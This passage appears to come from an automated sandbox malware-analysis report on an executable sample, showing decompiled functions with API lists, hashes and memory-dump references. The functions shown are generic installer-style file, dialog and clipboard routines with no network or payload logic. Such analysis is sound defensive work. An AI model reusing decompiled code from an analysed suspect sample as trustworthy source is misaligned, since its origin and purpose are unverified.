                    • Associated: 00000000.00000002.294066816.0000000000434000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.294188478.0000000000437000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: Char$Next$CreateDirectoryPrev
                    • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                    • API String ID: 4115351271-1075807775
                    • Opcode ID: d3ac2fd6cae103097c511f100747324c269b86177de792172be06caaae51c051
                    • Instruction ID: aa9e03880385e1d2cf47b50332cae3b8ca0df9fc70cebf3d54c0219f352de5d1
                    • Opcode Fuzzy Hash: d3ac2fd6cae103097c511f100747324c269b86177de792172be06caaae51c051
                    • Instruction Fuzzy Hash: 50D0C911517D3029CA51332A3D06FEF191C8F4776AFA5507BF808B60C64B7C2A8349EE
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00401389, Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                    Download Yara Rule
                    C-Code - Quality: 69%
                    			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				intOrPtr _t15;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t15 =  *0x42eb90; // 0x6c084c
					_t6 = _t17 * 0x1c + _t15;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42e34c =  *0x42e34c + _t12;
						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42e34c, 0x7530,  *0x42e334), 0);
					}
				}
				return 0;
			}












                    0x0040138a
                    0x004013fa
                    0x00401392
                    0x0040139b
                    0x004013a0
                    0x00000000
                    0x00000000
                    0x004013a2
                    0x004013a3
                    0x004013ad
                    0x00000000
                    0x00401404
                    0x004013b0
                    0x004013b7
                    0x004013bd
                    0x004013be
                    0x004013c0
                    0x004013c2
                    0x004013b9
                    0x004013b9
                    0x004013ba
                    0x004013ba
                    0x004013c9
                    0x004013cb
                    0x004013f4
                    0x004013f4
                    0x004013c9
                    0x00000000

                    APIs
                    • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                    • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                    Memory Dump Source
                    • Source File: 00000000.00000002.293500532.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.293492940.0000000000400000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293514085.0000000000407000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293540080.0000000000409000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293963975.000000000042C000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.294066816.0000000000434000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.294188478.0000000000437000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: MessageSend
                    • String ID:
                    • API String ID: 3850602802-0
                    • Opcode ID: cf7b3020d7635a73a7f034f7f9c2b240c5e2222d46fcf66a2415134205071e91
                    • Instruction ID: 8223ec958efd2c964e321ebce6dca8e406ed2778dd364e0d2667d4e2a9ef0db3
                    • Opcode Fuzzy Hash: cf7b3020d7635a73a7f034f7f9c2b240c5e2222d46fcf66a2415134205071e91
                    • Instruction Fuzzy Hash: FE01F4317242109BE7299B799D04B6A36D8E710325F14453FF955F72F1D678DC028B4D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00405602, Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                    Download Yara Rule
                    C-Code - Quality: 68%
                    			E00405602(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                    0x00405606
                    0x00405613
                    0x00405628
                    0x0040562e

                    APIs
                    • GetFileAttributesA.KERNELBASE(00000003,00402C4B,C:\Users\user\Desktop\U001P56ybm.exe,80000000,00000003), ref: 00405606
                    • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405628
                    Memory Dump Source
                    • Source File: 00000000.00000002.293500532.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.293492940.0000000000400000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293514085.0000000000407000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293540080.0000000000409000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293963975.000000000042C000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.294066816.0000000000434000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.294188478.0000000000437000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: File$AttributesCreate
                    • String ID:
                    • API String ID: 415043291-0
                    • Opcode ID: f96d5d8e90d761c4e0dddf78ec48930a46771e4615b27f2c581d09f506512028
                    • Instruction ID: 518821d5ca0a74227a37217cadb520a33af9faec79942caa6648154b48e23ab6
                    • Opcode Fuzzy Hash: f96d5d8e90d761c4e0dddf78ec48930a46771e4615b27f2c581d09f506512028
                    • Instruction Fuzzy Hash: DDD09E71658301AFEF098F20DE1AF2E7AA2EB84B01F10962CB646940E0D6715C15DB16
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004055E3, Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E004055E3(CHAR* _a4) {
				signed char _t3;

				_t3 = GetFileAttributesA(_a4); // executed
				if(_t3 != 0xffffffff) {
					return SetFileAttributesA(_a4, _t3 & 0x000000fe);
				}
				return _t3;
			}




                    0x004055e7
                    0x004055f0
                    0x00000000
                    0x004055f9
                    0x004055ff

                    APIs
                    • GetFileAttributesA.KERNELBASE(?,004053EE,?,?,?), ref: 004055E7
                    • SetFileAttributesA.KERNEL32(?,00000000), ref: 004055F9
                    Memory Dump Source
                    • Source File: 00000000.00000002.293500532.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.293492940.0000000000400000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293514085.0000000000407000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293540080.0000000000409000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293963975.000000000042C000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.294066816.0000000000434000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.294188478.0000000000437000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: AttributesFile
                    • String ID:
                    • API String ID: 3188754299-0
                    • Opcode ID: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
                    • Instruction ID: a5fed976df330e3c9be42370ef6aa70fcab56a8ff4bebce8f9239a379cf4a5bf
                    • Opcode Fuzzy Hash: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
                    • Instruction Fuzzy Hash: 77C04CB1808501BBD6015B34DF0D85F7B66EF50721B108B35F66AE04F4C7355C66EB1A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00403066, Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00403066(void* _a4, long _a8) {
				int _t6;
				long _t10;

				_t10 = _a8;
				_t6 = ReadFile( *0x409010, _a4, _t10,  &_a8, 0); // executed
				if(_t6 == 0 || _a8 != _t10) {
					return 0;
				} else {
					return 1;
				}
			}





                    0x0040306a
                    0x0040307d
                    0x00403085
                    0x00000000
                    0x0040308c
                    0x00000000
                    0x0040308e

                    APIs
                    • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,00402E93,000000FF,00000004,00000000,00000000,00000000), ref: 0040307D
                    Memory Dump Source
                    • Source File: 00000000.00000002.293500532.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.293492940.0000000000400000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293514085.0000000000407000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293540080.0000000000409000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293963975.000000000042C000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.294066816.0000000000434000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.294188478.0000000000437000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: FileRead
                    • String ID:
                    • API String ID: 2738559852-0
                    • Opcode ID: b55c46bdf794a51955d6c22ef273c930d40ecd644cbb4da6e13cbea0766faea3
                    • Instruction ID: db7eb9ea6f1a12052482ff51ad32c18cee35d2953ec2f1fcf73c5929b0b6aa83
                    • Opcode Fuzzy Hash: b55c46bdf794a51955d6c22ef273c930d40ecd644cbb4da6e13cbea0766faea3
                    • Instruction Fuzzy Hash: 84E08631251119BBCF105E719C04E9B3B5CEB053A5F008033FA55E5190D530DA50DBA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00403098, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00403098(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x409010, _a4, 0, 0); // executed
				return _t2;
			}




                    0x004030a6
                    0x004030ac

                    APIs
                    • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402DD2,000081E4), ref: 004030A6
                    Memory Dump Source
                    • Source File: 00000000.00000002.293500532.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.293492940.0000000000400000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293514085.0000000000407000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293540080.0000000000409000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293963975.000000000042C000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.294066816.0000000000434000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.294188478.0000000000437000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: FilePointer
                    • String ID:
                    • API String ID: 973152223-0
                    • Opcode ID: a4f108b6483d59a247dd719aa3338c70368b303c79d310cc125f674897935547
                    • Instruction ID: 0cdacc43d416a0c3c320ce55ce8d4373a9ea66752a7e2c64ddc4eeaf6ba3fa4d
                    • Opcode Fuzzy Hash: a4f108b6483d59a247dd719aa3338c70368b303c79d310cc125f674897935547
                    • Instruction Fuzzy Hash: 49B01271644200BFDA214F00DF05F057B31B790700F108430B394380F082712420EB0D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Non-executed Functions

                    Function 00404E07, Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 278windowclipboardmemoryCOMMON
                    Download Yara Rule
                    C-Code - Quality: 96%
                    			E00404E07(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t87;
				unsigned int _t92;
				unsigned int _t93;
				int _t94;
				int _t95;
				long _t98;
				void* _t101;
				intOrPtr _t123;
				struct HWND__* _t127;
				int _t149;
				int _t150;
				struct HWND__* _t154;
				struct HWND__* _t158;
				struct HMENU__* _t160;
				long _t162;
				void* _t163;
				short* _t164;

				_t154 =  *0x42e344; // 0x0
				_t149 = 0;
				_v8 = _t154;
				if(_a8 != 0x110) {
					__eflags = _a8 - 0x405;
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E00404D9B, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
					}
					__eflags = _a8 - 0x111;
					if(_a8 != 0x111) {
						L17:
						__eflags = _a8 - 0x404;
						if(_a8 != 0x404) {
							L25:
							__eflags = _a8 - 0x7b;
							if(_a8 != 0x7b) {
								goto L20;
							}
							__eflags = _a12 - _t154;
							if(_a12 != _t154) {
								goto L20;
							}
							_t87 = SendMessageA(_t154, 0x1004, _t149, _t149);
							__eflags = _t87 - _t149;
							_a8 = _t87;
							if(_t87 <= _t149) {
								L37:
								return 0;
							}
							_t160 = CreatePopupMenu();
							AppendMenuA(_t160, _t149, 1, E0040594D(_t149, _t154, _t160, _t149, 0xffffffe1));
							_t92 = _a16;
							__eflags = _t92 - 0xffffffff;
							if(_t92 != 0xffffffff) {
								_t150 = _t92;
								_t93 = _t92 >> 0x10;
								__eflags = _t93;
								_t94 = _t93;
							} else {
								GetWindowRect(_t154,  &_v28);
								_t150 = _v28.left;
								_t94 = _v28.top;
							}
							_t95 = TrackPopupMenu(_t160, 0x180, _t150, _t94, _t149, _a4, _t149);
							_t162 = 1;
							__eflags = _t95 - 1;
							if(_t95 == 1) {
								_v60 = _t149;
								_v48 = 0x429fd8;
								_v44 = 0xfff;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t98 = SendMessageA(_v8, 0x102d, _a4,  &_v68);
									__eflags = _a4 - _t149;
									_t162 = _t162 + _t98 + 2;
								} while (_a4 != _t149);
								OpenClipboard(_t149);
								EmptyClipboard();
								_t101 = GlobalAlloc(0x42, _t162);
								_a4 = _t101;
								_t163 = GlobalLock(_t101);
								do {
									_v48 = _t163;
									_t164 = _t163 + SendMessageA(_v8, 0x102d, _t149,  &_v68);
									 *_t164 = 0xa0d;
									_t163 = _t164 + 2;
									_t149 = _t149 + 1;
									__eflags = _t149 - _a8;
								} while (_t149 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(1, _a4);
								CloseClipboard();
							}
							goto L37;
						}
						__eflags =  *0x42e32c - _t149; // 0x0
						if(__eflags == 0) {
							ShowWindow( *0x42eb68, 8);
							__eflags =  *0x42ebec - _t149; // 0x0
							if(__eflags == 0) {
								E00404CC9( *((intOrPtr*)( *0x4297a8 + 0x34)), _t149);
							}
							E00403CB6(1);
							goto L25;
						}
						 *0x4293a0 = 2;
						E00403CB6(0x78);
						goto L20;
					} else {
						__eflags = _a12 - 0x403;
						if(_a12 != 0x403) {
							L20:
							return E00403D44(_a8, _a12, _a16);
						}
						ShowWindow( *0x42e330, _t149);
						ShowWindow(_t154, 8);
						E00403D12(_t154);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_v60 = 2;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t123 =  *0x42eb70; // 0x6bfe70
				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
				_a12 =  *((intOrPtr*)(_t123 + 0x60));
				 *0x42e330 = GetDlgItem(_a4, 0x403);
				 *0x42e328 = GetDlgItem(_a4, 0x3ee);
				_t127 = GetDlgItem(_a4, 0x3f8);
				 *0x42e344 = _t127;
				_v8 = _t127;
				E00403D12( *0x42e330);
				 *0x42e334 = E0040456B(4);
				 *0x42e34c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(0x15);
				SendMessageA(_v8, 0x101b, 0,  &_v60);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a8);
					SendMessageA(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t149) {
					SendMessageA(_v8, 0x1024, _t149, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00403CDD(_a4);
				if(( *0x42eb78 & 0x00000003) != 0) {
					ShowWindow( *0x42e330, _t149);
					if(( *0x42eb78 & 0x00000002) != 0) {
						 *0x42e330 = _t149;
					} else {
						ShowWindow(_v8, 8);
					}
					E00403D12( *0x42e328);
				}
				_t158 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t158, 0x401, _t149, 0x75300000);
				if(( *0x42eb78 & 0x00000004) != 0) {
					SendMessageA(_t158, 0x409, _t149, _a12);
					SendMessageA(_t158, 0x2001, _t149, _a8);
				}
				goto L37;
			}


































                    0x00404e10
                    0x00404e16
                    0x00404e1f
                    0x00404e22
                    0x00404fb3
                    0x00404fba
                    0x00404fde
                    0x00404fde
                    0x00404fe4
                    0x00404ff1
                    0x0040500f
                    0x0040500f
                    0x00405016
                    0x0040506d
                    0x0040506d
                    0x00405071
                    0x00000000
                    0x00000000
                    0x00405073
                    0x00405076
                    0x00000000
                    0x00000000
                    0x00405080
                    0x00405086
                    0x00405088
                    0x0040508b
                    0x00405184
                    0x00000000
                    0x00405184
                    0x0040509a
                    0x004050a6
                    0x004050ac
                    0x004050af
                    0x004050b2
                    0x004050c7
                    0x004050ca
                    0x004050ca
                    0x004050cd
                    0x004050b4
                    0x004050b9
                    0x004050bf
                    0x004050c2
                    0x004050c2
                    0x004050dd
                    0x004050e5
                    0x004050e6
                    0x004050e8
                    0x004050f1
                    0x004050f4
                    0x004050fb
                    0x00405102
                    0x0040510a
                    0x0040510a
                    0x00405118
                    0x0040511e
                    0x00405121
                    0x00405121
                    0x00405128
                    0x0040512e
                    0x00405137
                    0x0040513e
                    0x00405147
                    0x00405149
                    0x0040514c
                    0x0040515b
                    0x0040515d
                    0x00405163
                    0x00405164
                    0x00405165
                    0x00405165
                    0x0040516d
                    0x00405178
                    0x0040517e
                    0x0040517e
                    0x00000000
                    0x004050e8
                    0x00405018
                    0x0040501e
                    0x0040504e
                    0x00405050
                    0x00405056
                    0x00405061
                    0x00405061
                    0x00405068
                    0x00000000
                    0x00405068
                    0x00405022
                    0x0040502c
                    0x00000000
                    0x00404ff3
                    0x00404ff3
                    0x00404ff9
                    0x00405031
                    0x00000000
                    0x0040503a
                    0x00405002
                    0x00405007
                    0x0040500a
                    0x00000000
                    0x0040500a
                    0x00404ff1
                    0x00404e28
                    0x00404e2c
                    0x00404e35
                    0x00404e3c
                    0x00404e3f
                    0x00404e42
                    0x00404e45
                    0x00404e46
                    0x00404e47
                    0x00404e60
                    0x00404e63
                    0x00404e6d
                    0x00404e7c
                    0x00404e84
                    0x00404e8c
                    0x00404e91
                    0x00404e94
                    0x00404ea0
                    0x00404ea9
                    0x00404eb2
                    0x00404ed5
                    0x00404edb
                    0x00404eec
                    0x00404ef1
                    0x00404eff
                    0x00404f0d
                    0x00404f0d
                    0x00404f12
                    0x00404f20
                    0x00404f20
                    0x00404f25
                    0x00404f28
                    0x00404f2d
                    0x00404f39
                    0x00404f42
                    0x00404f4f
                    0x00404f5e
                    0x00404f51
                    0x00404f56
                    0x00404f56
                    0x00404f6a
                    0x00404f6a
                    0x00404f7e
                    0x00404f87
                    0x00404f90
                    0x00404fa0
                    0x00404fac
                    0x00404fac
                    0x00000000

                    APIs
                    • GetDlgItem.USER32 ref: 00404E66
                    • GetDlgItem.USER32 ref: 00404E75
                    • GetClientRect.USER32 ref: 00404EB2
                    • GetSystemMetrics.USER32 ref: 00404EBA
                    • SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 00404EDB
                    • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00404EEC
                    • SendMessageA.USER32(?,00001001,00000000,00000110), ref: 00404EFF
                    • SendMessageA.USER32(?,00001026,00000000,00000110), ref: 00404F0D
                    • SendMessageA.USER32(?,00001024,00000000,?), ref: 00404F20
                    • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00404F42
                    • ShowWindow.USER32(?,00000008), ref: 00404F56
                    • GetDlgItem.USER32 ref: 00404F77
                    • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00404F87
                    • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 00404FA0
                    • SendMessageA.USER32(00000000,00002001,00000000,00000110), ref: 00404FAC
                    • GetDlgItem.USER32 ref: 00404E84
                      • Part of subcall function 00403D12: SendMessageA.USER32(00000028,?,00000001,00403B43), ref: 00403D20
                    • GetDlgItem.USER32 ref: 00404FC9
                    • CreateThread.KERNEL32 ref: 00404FD7
                    • CloseHandle.KERNEL32(00000000), ref: 00404FDE
                    • ShowWindow.USER32(00000000), ref: 00405002
                    • ShowWindow.USER32(00000000,00000008), ref: 00405007
                    • ShowWindow.USER32(00000008), ref: 0040504E
                    • SendMessageA.USER32(00000000,00001004,00000000,00000000), ref: 00405080
                    • CreatePopupMenu.USER32 ref: 00405091
                    • AppendMenuA.USER32 ref: 004050A6
                    • GetWindowRect.USER32 ref: 004050B9
                    • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004050DD
                    • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405118
                    • OpenClipboard.USER32(00000000), ref: 00405128
                    • EmptyClipboard.USER32(?,?,00000000,?,00000000), ref: 0040512E
                    • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 00405137
                    • GlobalLock.KERNEL32 ref: 00405141
                    • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405155
                    • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 0040516D
                    • SetClipboardData.USER32 ref: 00405178
                    • CloseClipboard.USER32 ref: 0040517E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.293500532.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.293492940.0000000000400000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293514085.0000000000407000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293540080.0000000000409000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293963975.000000000042C000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.294066816.0000000000434000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.294188478.0000000000437000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                    • String ID: {
                    • API String ID: 590372296-366298937
                    • Opcode ID: 3d08310bbd43469a5120837c1ff2279d190d817ca8ed5af4582344c2043299ca
                    • Instruction ID: 6b58894f072d387ff385a1976498fa71d2bdad0bf2474ce794c2d1da48ffa65f
                    • Opcode Fuzzy Hash: 3d08310bbd43469a5120837c1ff2279d190d817ca8ed5af4582344c2043299ca
                    • Instruction Fuzzy Hash: 48A14971900208BFEB219F61DD89AAE7F79FB08355F00407AFA05BA1A0C7755E41DFA9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00404618, Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 478windowmemoryCOMMONCrypto
                    Download Yara Rule
                    C-Code - Quality: 98%
                    			E00404618(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				signed int _v16;
				intOrPtr _v20;
				void* _v24;
				long _v28;
				int _v32;
				signed int _v40;
				int _v44;
				signed int* _v56;
				intOrPtr _v60;
				signed int _v64;
				long _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t182;
				intOrPtr _t183;
				int _t189;
				int _t196;
				intOrPtr _t198;
				long _t202;
				signed int _t206;
				signed int _t217;
				void* _t220;
				void* _t221;
				int _t227;
				intOrPtr _t231;
				signed int _t232;
				signed int _t233;
				signed int _t240;
				signed int _t242;
				signed int _t245;
				signed int _t247;
				struct HBITMAP__* _t250;
				void* _t252;
				char* _t268;
				signed char _t269;
				long _t274;
				int _t280;
				signed int* _t281;
				int _t282;
				long _t283;
				signed int* _t284;
				int _t285;
				long _t286;
				signed int _t287;
				long _t288;
				signed int _t291;
				int _t294;
				signed int _t298;
				signed int _t300;
				signed int _t302;
				intOrPtr _t309;
				int* _t310;
				void* _t311;
				int _t315;
				int _t316;
				int _t317;
				signed int _t318;
				void* _t320;
				void* _t328;
				void* _t331;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_t182 = GetDlgItem(_a4, 0x408);
				_t280 =  *0x42eb88; // 0x6c001c
				_t320 = SendMessageA;
				_v8 = _t182;
				_t183 =  *0x42eb70; // 0x6bfe70
				_t315 = 0;
				_v32 = _t280;
				_v20 = _t183 + 0x94;
				if(_a8 != 0x110) {
					L23:
					__eflags = _a8 - 0x405;
					if(_a8 != 0x405) {
						_t289 = _a16;
					} else {
						_a12 = _t315;
						_t289 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					__eflags = _a8 - 0x4e;
					if(_a8 == 0x4e) {
						L28:
						__eflags = _a8 - 0x413;
						_v16 = _t289;
						if(_a8 == 0x413) {
							L30:
							__eflags =  *0x42eb79 & 0x00000002;
							if(( *0x42eb79 & 0x00000002) != 0) {
								L41:
								__eflags = _v16 - _t315;
								if(_v16 != _t315) {
									_t232 = _v16;
									__eflags =  *((intOrPtr*)(_t232 + 8)) - 0xfffffe6e;
									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
									}
									_t233 = _v16;
									__eflags =  *((intOrPtr*)(_t233 + 8)) - 0xfffffe6a;
									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
										__eflags =  *((intOrPtr*)(_t233 + 0xc)) - 2;
										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
											_t284 =  *(_t233 + 0x5c) * 0x418 + _t280 + 8;
											 *_t284 =  *_t284 & 0xffffffdf;
											__eflags =  *_t284;
										} else {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							__eflags = _a8 - 0x413;
							if(_a8 == 0x413) {
								L33:
								__eflags = _a8 - 0x413;
								_t289 = 0 | _a8 != 0x00000413;
								_t240 = E00404598(_v8, _a8 != 0x413);
								__eflags = _t240 - _t315;
								if(_t240 >= _t315) {
									_t93 = _t280 + 8; // 0x8
									_t310 = _t240 * 0x418 + _t93;
									_t289 =  *_t310;
									__eflags = _t289 & 0x00000010;
									if((_t289 & 0x00000010) == 0) {
										__eflags = _t289 & 0x00000040;
										if((_t289 & 0x00000040) == 0) {
											_t298 = _t289 ^ 0x00000001;
											__eflags = _t298;
										} else {
											_t300 = _t289 ^ 0x00000080;
											__eflags = _t300;
											if(_t300 >= 0) {
												_t298 = _t300 & 0xfffffffe;
											} else {
												_t298 = _t300 | 0x00000001;
											}
										}
										 *_t310 = _t298;
										E0040117D(_t240);
										_t242 =  *0x42eb78; // 0x80
										_t289 = 1;
										_a8 = 0x40f;
										_t245 =  !_t242 >> 0x00000008 & 1;
										__eflags = _t245;
										_a12 = 1;
										_a16 = _t245;
									}
								}
								goto L41;
							}
							_t289 = _a16;
							__eflags =  *((intOrPtr*)(_t289 + 8)) - 0xfffffffe;
							if( *((intOrPtr*)(_t289 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						}
						__eflags =  *((intOrPtr*)(_t289 + 4)) - 0x408;
						if( *((intOrPtr*)(_t289 + 4)) != 0x408) {
							goto L48;
						}
						goto L30;
					} else {
						__eflags = _a8 - 0x413;
						if(_a8 != 0x413) {
							L48:
							__eflags = _a8 - 0x111;
							if(_a8 != 0x111) {
								L56:
								__eflags = _a8 - 0x200;
								if(_a8 == 0x200) {
									SendMessageA(_v8, 0x200, _t315, _t315);
								}
								__eflags = _a8 - 0x40b;
								if(_a8 == 0x40b) {
									_t220 =  *0x429fb4;
									__eflags = _t220 - _t315;
									if(_t220 != _t315) {
										ImageList_Destroy(_t220);
									}
									_t221 =  *0x429fcc;
									__eflags = _t221 - _t315;
									if(_t221 != _t315) {
										GlobalFree(_t221);
									}
									 *0x429fb4 = _t315;
									 *0x429fcc = _t315;
									 *0x42ebc0 = _t315;
								}
								__eflags = _a8 - 0x40f;
								if(_a8 != 0x40f) {
									L86:
									__eflags = _a8 - 0x420;
									if(_a8 == 0x420) {
										__eflags =  *0x42eb79 & 0x00000001;
										if(( *0x42eb79 & 0x00000001) != 0) {
											__eflags = _a16 - 0x20;
											_t189 = (0 | _a16 == 0x00000020) << 3;
											__eflags = _t189;
											_t316 = _t189;
											ShowWindow(_v8, _t316);
											ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
										}
									}
									goto L89;
								} else {
									E004011EF(_t289, _t315, _t315);
									__eflags = _a12 - _t315;
									if(_a12 != _t315) {
										E0040140B(8);
									}
									__eflags = _a16 - _t315;
									if(_a16 == _t315) {
										L73:
										E004011EF(_t289, _t315, _t315);
										__eflags =  *0x42eb8c - _t315; // 0x2
										_v32 =  *0x429fcc;
										_t196 =  *0x42eb88; // 0x6c001c
										_v60 = 0xf030;
										_v16 = _t315;
										if(__eflags <= 0) {
											L84:
											InvalidateRect(_v8, _t315, 1);
											_t198 =  *0x42e33c; // 0x6c4e95
											__eflags =  *((intOrPtr*)(_t198 + 0x10)) - _t315;
											if( *((intOrPtr*)(_t198 + 0x10)) != _t315) {
												E004044B6(0x3ff, 0xfffffffb, E0040456B(5));
											}
											goto L86;
										} else {
											_t142 = _t196 + 8; // 0x6c0024
